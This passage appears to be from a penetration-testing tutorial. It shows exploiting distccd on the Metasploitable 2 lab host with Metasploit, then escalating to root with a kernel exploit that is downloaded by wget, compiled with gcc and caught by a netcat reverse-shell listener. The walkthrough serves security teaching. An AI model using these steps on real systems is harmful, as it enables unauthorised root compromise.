In this section, we'll see how we can exploit a vulnerability in a Linux system and then escalate our privileges. We'll be using Metasploitable 2 as our target.
Before we can even think of privilege escalation, we must have at least normal-level access to the target system. In this case, our target system's IP address is 192.168.25.129. We start by initiating SPARTA in order to gather some quick information about our target. We add the target IP in the scope of the SPARTA scan, as shown in the following screenshot:
Once the SPARTA scan is complete, we get to know what services are running on our target system. Now we find out that the target system is running one service, distccd (as shown in the following screenshot), that is a distributed computing application used for source-code compilation:
Now that we know the service to be exploited, we'll open up the Metasploit console to look for any exploits related to distcc:
We get an exploit named distcc_exec readily available in Metasploit. We now look for parameters that we need to configure using the show options command. Then we set the value of the RHOST (target) parameter and fire the exploit command:
The exploit succeeds and presents us with a remote command shell. However, the shell has limited privileges and now we need to escalate privileges to that of root. Using the uname command, we get to know that the target is based on Linux kernel 2.6.X. So, we need to find out which privilege-escalation exploit would suit this kernel version. We can search for specific exploits using the searchsploit utility. The following command will list the exploit we need:
searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6 | grep 8572
We can now use the wget command on our target system to download the exploit, as shown in the following screenshot. Once downloaded, we use the following command to compile the exploit locally:
gcc -o exploit 8572.c
On our Kali Linux system, we start a Netcat listener on port 12345 using the following command:
nc -lvp 12345
As soon as the exploit is executed on the target system, we get a reverse shell on our Kali system, as shown in the following screenshot, with root privileges. Hence we have succeeded in escalating the privileges from normal user to root:
